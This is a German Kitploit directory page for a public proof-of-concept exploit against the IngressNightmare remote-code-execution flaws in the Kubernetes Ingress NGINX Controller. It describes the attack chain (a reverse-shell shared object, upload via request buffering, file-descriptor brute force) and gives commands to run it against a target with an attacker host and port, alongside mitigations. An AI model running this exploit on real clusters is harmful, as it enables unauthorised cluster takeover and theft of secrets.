Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
IngressNightmare-PoC — Dies ist ein PoC-Code zur Ausnutzung der IngressNightmare-Sicherheitslücken (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 und CVE-2025-1974). | Kitploit
Tools/GitHubGitHub/hakaioffsec/ingressnightmare-poc
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCloud-SicherheitLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
hakaioffsec/ingressnightmare-poc

IngressNightmare-PoC

Dies ist ein PoC-Code zur Ausnutzung der IngressNightmare-Sicherheitslücken (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 und CVE-2025-1974).

Repository anzeigen
248533vor 1 JahrVon Kitploit geprüft

Exploit für Ingress NGINX - IngressNightmare

Dieses Projekt stellt einen Exploit für kritische unauthenticated Remote Code Execution (RCE) Schwachstellen im Ingress NGINX Controller für Kubernetes bereit, die gemeinsam als IngressNightmare bezeichnet werden. (Forschung von Wiz)

In der ursprünglichen Forschung hat das Wiz-Team keinen PoC oder funktionsfähigen Exploit bereitgestellt, daher haben wir uns entschlossen, unseren eigenen zu erstellen und mit der Community zu teilen.

Übersicht

Der Ingress NGINX Controller ist eine weit verbreitete Komponente in Kubernetes-Umgebungen, die den externen Zugriff auf Dienste innerhalb von Clustern verwaltet. Aktuelle Schwachstellen (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974), die in seinem Admission Controller entdeckt wurden, können zu unbefugtem Zugriff auf alle Secrets über Namespaces hinweg führen und potenziell eine vollständige Clusterübernahme ermöglichen.

VIDEO

https://github.com/user-attachments/assets/9e893abf-5c01-4fcb-ad79-7115b429281f

Exploit-Workflow

Der Exploit folgt diesen Hauptschritten:

Shared Object generieren (wird von der injizierten ssl_engine-Eigenschaft verwendet): Kompiliert eine .so-Bibliothek (evil_engine.so), die eine Reverse-Shell-Payload enthält.

Shared Object hochladen: Sendet das kompilierte Shared Object an den Ingress-Pod, wobei die Request-Verarbeitung (Client Body Buffer) ausgenutzt wird. Der Trick besteht darin, dem Server einen anderen Content-Length zu senden, um die Verbindung offen zu halten und den Dateideskriptor für die geöffnete Datei zu erhalten.

Brute-Force auf fd: Iteriert über Prozess-IDs und Dateideskriptoren (/proc/{pid}/fd/{fd}), um den korrekten Deskriptor zu identifizieren, der auf das hochgeladene Objekt verweist.

Nutzung

Voraussetzungen: Python 3.x GCC-Compiler Python-Requests-Modul

Exploit ausführen:

pip3 install -r requirements.txt

python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/hakaioffsec/ingressnightmare-poc/blob/main/attacker_host%3Aport)

Beispiel: python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443

Manchmal befindet sich der Admission Webhook in einem anderen Namespace. In diesem Fall müssen Sie den Namespace am Ende angeben, z. B. kube-system, default oder ingress-nginx.

<ingress_url>: Ziel-Ingress-URL (öffentlich)

<admission_webhook_url>: Admission-Webhook-URL (interner Webhook)

attacker_host:port: Ihr Host und Port für die Reverse Shell

Gegenmaßnahmen

Sofort aktualisieren: Aktualisieren Sie den Ingress NGINX Controller auf gepatchte Versionen (1.12.1 oder 1.11.5).

Admission Webhook einschränken: Beschränken Sie den Zugriff auf den Webhook nur auf den Kubernetes API Server.

Vorübergehende Deaktivierung: Ziehen Sie in Betracht, die Admission-Controller-Komponente vorübergehend zu deaktivieren, falls ein Upgrade nicht sofort möglich ist.

QuimeraX Intelligence

QuimeraX Intelligence ist eine fortschrittliche EASM- und Cyber-Threat-Intelligence-Plattform, die auf die Identifizierung kritischer Schwachstellen in komplexen Systemen spezialisiert ist. Die Plattform überwacht, erkennt und alarmiert Kunden proaktiv über Sicherheitsbedrohungen und gewährleistet Transparenz sowie schnelle Reaktion auf potenzielle Risiken. Kunden erhalten sofortige Benachrichtigungen und umfassende Berichte, falls ihre Systeme als verwundbar eingestuft werden, sodass sie Schutzmaßnahmen ergreifen können. mehr erfahren

Hakai Security

Hakai Security ist ein Cybersicherheitsunternehmen, das von Sicherheitsexperten gegründet wurde und sich technischer Exzellenz verpflichtet fühlt. Wir bieten maßgeschneiderte Sicherheitslösungen, darunter fortgeschrittene Penetrationstests, realistische Red-Team-Simulationen und sichere Entwicklungspraktiken, um die Vermögenswerte unserer Kunden proaktiv vor sich entwickelnden Cyberbedrohungen zu schützen. mehr erfahren

Haftungsausschluss

Dieser Exploit wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Unbefugte Nutzung dieses Tools gegen Ziele ohne ausdrückliche Genehmigung. Hakai Security und QuimeraX übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch die Verwendung dieses Exploits entstehen.

Tool herunterladen